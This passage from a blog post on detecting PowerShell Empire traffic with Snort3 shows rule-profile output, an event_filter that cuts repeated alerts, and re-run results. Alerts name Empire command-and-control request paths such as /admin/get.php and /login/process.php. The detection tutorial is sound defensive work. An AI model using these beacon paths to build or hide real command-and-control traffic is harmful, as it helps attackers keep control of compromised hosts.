<span style="color: white;"> events: 12</span>
<span style="color: white;"> syn_trackers: 69</span>
<span style="color: white;"> segs_queued: 7414</span>
<span style="color: white;"> segs_released: 7414</span>
<span style="color: white;"> segs_used: 3224</span>
<span style="color: white;"> rebuilt_packets: 4029</span>
<span style="color: white;"> rebuilt_buffers: 20</span>
<span style="color: white;"> rebuilt_bytes: 1064009</span>
<span style="color: white;"> gaps: 47</span>
<span style="color: white;"> client_cleanups: 29</span>
<span style="color: white;"> server_cleanups: 10</span>
<span style="color: white;"> syns: 69</span>
<span style="color: white;"> syn_acks: 29</span>
<span style="color: white;"> resets: 54</span>
<span style="color: white;"> fins: 13</span>
<span style="color: white;"> inspector_fallbacks: 5</span>
<span style="color: white;"> partial_fallbacks: 22</span>
<span style="color: white;"> max_segs: 816</span>
<span style="color: white;"> max_bytes: 410007</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">wizard</span>
<span style="color: white;"> tcp_scans: 4</span>
<span style="color: white;"> tcp_hits: 4</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Summary Statistics</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">timing</span>
<span style="color: white;"> runtime: 00:00:00</span>
<span style="color: white;"> seconds: 0.073711</span>
<span style="color: white;"> pkts/sec: 17365</span>
<span style="color: white;"> Mbits/sec: 52</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">module profile (all, depth 255, sorted by total_time)</span>
<span style="color: white;"># module layer checks time(us) avg/check %/caller %/total</span>
<span style="color: white;">= ====== ===== ====== ======== ========= ======== =======</span>
<span style="color: white;"> 1 other 1 17365 26070 1 36.73 36.73</span>
<span style="color: white;"> 2 stream_tcp 1 13785 16034 1 22.59 22.59</span>
<span style="color: white;"> 3 daq 1 17638 9925 0 13.98 13.98</span>
<span style="color: white;"> 4 http_inspect 1 16750 4542 0 6.40 6.40</span>
<span style="color: white;"> 5 mpse 1 53710 4029 0 5.68 5.68</span>
<span style="color: white;"> 6 rule_eval 1 18036 2855 0 4.02 4.02</span>
<span style="color: white;"> 7 decode 1 17365 2236 0 3.15 3.15</span>
<span style="color: white;"> 8 stream 1 15755 1919 0 2.70 2.70</span>
<span style="color: white;"> 9 eventq 1 25798 1613 0 2.27 2.27</span>
<span style="color: white;"> 10 paf 1 10990 1427 0 2.01 2.01</span>
<span style="color: white;"> 11 binder 1 3662 313 0 0.44 0.44</span>
<span style="color: white;"> 12 wizard 1 4 8 2 0.01 0.01</span>
<span style="color: white;">-- total -- 17365 70977 4 -- 100.00</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">rule profile (all, sorted by total_time)</span>
<span style="color: white;"># gid sid rev checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends</span>
<span style="color: white;">= === === === ====== ======= ====== ========= ========= ========= ============= ======== ========</span>
<span style="color: white;">1 14000003 10 472 452 452 4310 9 9 0 0 0</span>
<span style="color: white;">2 14000004 10 398 377 377 4139 10 10 0 0 0</span>
<span style="color: white;">3 14000002 10 436 3 3 375 0 38 0 0 0</span>
<span style="color: white;">4 14000001 10 12 3 3 308 25 86 5 0 0</span>
<span style="color: white;">o")~ Snort exiting</span>
</pre></div>
</div><div><br /></div><div><div>When we look above, we see that in one instance of we have 452 alerts and another of 377. The others with 3 we can live with. However, those 300+ and 400+ alerts can be a real headache for us as analysts, thus contributing to the so called <i>alert fatigue</i>. Let's reduce this noise ... and the fatigue.</div><div><br /></div><div>Let's add the following event filter to the <i>snort.lua</i> file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">event_filter =</span>
<span style="color: white;">{</span>
<span style="color: white;"> -- alerts once per 60 seconds then ignore any additional events during the 60 seconds.</span>
<span style="color: white;"> { gid = 1, sid = 4000001, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000002, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000003, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000004, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;">}</span>
</pre></div>
</div><div><br /></div><div><div>When Snort3 is run against the pcap, this time we see</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_talos --talos --pcap-show -k none -d -R local.rules -c snort.lua -q</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">##### empire-full-session.pcap #####</span>
<span style="color: white;"> [1:4000001:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected (alerts: 1)</span>
<span style="color: white;"> [1:4000002:10] POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected (alerts: 1)</span>
<span style="color: white;"> [1:4000003:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected (alerts: 1)</span>
<span style="color: white;"> [1:4000004:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected (alerts: 1)</span>
<span style="color: white;">#####</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">module profile (all, depth 255, sorted by total_time)</span>
<span style="color: white;"># module layer checks time(us) avg/check %/caller %/total</span>
<span style="color: white;">= ====== ===== ====== ======== ========= ======== =======</span>
<span style="color: white;"> 1 other 1 17365 29039 1 39.42 39.42</span>
<span style="color: white;"> 2 stream_tcp 1 13785 15494 1 21.03 21.03</span>
<span style="color: white;"> 3 daq 1 17638 10463 0 14.20 14.20</span>
<span style="color: white;"> 4 http_inspect 1 16750 4428 0 6.01 6.01</span>
<span style="color: white;"> 5 mpse 1 53704 4115 0 5.59 5.59</span>
<span style="color: white;"> 6 rule_eval 1 18033 2923 0 3.97 3.97</span>
<span style="color: white;"> 7 stream 1 15755 2240 0 3.04 3.04</span>
<span style="color: white;"> 8 decode 1 17365 2203 0 2.99 2.99</span>
<span style="color: white;"> 9 paf 1 10989 1419 0 1.93 1.93</span>
<span style="color: white;"> 10 eventq 1 25792 994 0 1.35 1.35</span>
<span style="color: white;"> 11 binder 1 3662 336 0 0.46 0.46</span>
<span style="color: white;"> 12 wizard 1 4 7 1 0.01 0.01</span>
<span style="color: white;">-- total -- 17365 73666 4 -- 100.00</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">rule profile (all, sorted by total_time)</span>
<span style="color: white;"># gid sid rev checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends</span>
<span style="color: white;">= === === === ====== ======= ====== ========= ========= ========= ============= ======== ========</span>
<span style="color: white;">1 14000003 10 472 452 1 4786 10 10 0 0 0</span>
<span style="color: white;">2 14000004 10 398 377 1 3933 9 10 0 0 0</span>
<span style="color: white;">3 14000002 10 436 3 1 366 0 38 0 0 0</span>
<span style="color: white;">4 14000001 10 12 3 1 311 25 82 7 0 0</span>
</pre></div>
</div><div><br /></div><div><div>This is much better. From an Analyst perspective, we would prefer to not not have alert fatigue.</div><div><br /></div><div>This is the end of this post, see you in the next post, where we use Zeek to detect this activity.</div><div><br /></div><div><p><b>Other posts in this series:</b><br /></p><p><a href="https://www.securitynik.com/2022/02/beginning-powershell-empire-attack-in.html" target="_blank">Beginning Powershell Empire - The Attack in 10 steps</a><br /><a href="Beginning PowerShell Empire - Log Analysis" target="_blank">Powershell Empire Log Analysis</a><br /><a href="https://www.securitynik.com/2022/02/beginning-powershell-empire-packet.html" target="_blank">Powershell Empire Packet Analysis</a><br /><a href="https://www.securitynik.com/2022/02/powershell-empire-detection-with-snort3.html" target="_blank">Powershell Empire Detection with Snort</a><br /><a href="https://www.securitynik.com/2022/02/powershell-empire-detection-with-zeek.html" target="_blank">Powershell Empire - Detection with Zeek</a></p></div><div><br /></div><div><br /></div><div>References:</div><div><a href="https://www.securitynik.com/2021/02/snort3-on-ubuntu-20-initial-setup.html">https://www.securitynik.com/2021/02/snort3-on-ubuntu-20-initial-setup.html</a></div><div><a href="https://www.youtube.com/watch?v=W1pb9DFCXLw&list=PLpPXZRVU-dX33VNUeqWrMmBNf5FeKVmi-">https://www.youtube.com/watch?v=W1pb9DFCXLw&list=PLpPXZRVU-dX33VNUeqWrMmBNf5FeKVmi-</a></div><div><a href="https://github.com/threatstream/snort/blob/master/etc/classification.config">https://github.com/threatstream/snort/blob/master/etc/classification.config</a></div><div><a href="https://snort.org/faq/readme-filters">https://snort.org/faq/readme-filters</a></div><div><a href="https://www.snort.org/downloads">https://www.snort.org/downloads</a></div></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com1